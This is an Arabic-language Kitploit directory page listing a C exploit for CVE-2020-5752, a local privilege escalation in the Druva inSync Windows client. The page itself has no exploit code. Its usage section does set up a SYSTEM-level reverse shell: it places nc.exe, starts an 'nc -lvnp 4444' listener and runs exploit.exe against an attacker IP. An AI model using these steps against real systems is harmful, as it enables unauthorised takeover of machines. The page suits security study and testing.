Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-5752 — تصعيد الامتيازات المحلي لـ Druva | Kitploit
أدوات/GitHubGitHub/x0rbeexd/cve-2020-5752
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

تصعيد الامتيازات المحلي لـ Druva

عرض المستودع
11منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-5752: تصعيد الامتيازات المحلي في Druva inSync

أداة استغلال مكتوبة بلغة C لعميل Druva inSync لنظام Windows (الإصدار 6.6.3 وما دونه). يوفّر التطبيق خدمة RPC على المنفذ 6064 وهي معرّضة لحقن أوامر عبر اجتياز المسار. وهذا يسمح لمستخدم محلي بتنفيذ أوامر عشوائية بصلاحيات NT AUTHORITY\SYSTEM.

تفاصيل الثغرة

  • CVE: 2020-5752
  • تم الاختبار على: Windows 10 (x64)
  • مستوى الامتياز: تصعيد الامتيازات المحلي (LPE)

الاستخدام

1. التجميع

استخدم gcc (MinGW) لتجميع الكود المصدري:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. التحضير

ضع نسخة من nc.exe في مجلد يمكن لحساب SYSTEM الوصول إليه (مثل C:\Windows\Tasks).

3. التنفيذ

شغّل مستمعًا على جهاز المهاجم:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

إخلاء مسؤولية

هذه الأداة لأغراض تعليمية فقط. الاستخدام غير المصرح به على أنظمة ليس لديك إذن باختبارها غير قانوني.

تنزيل الأداة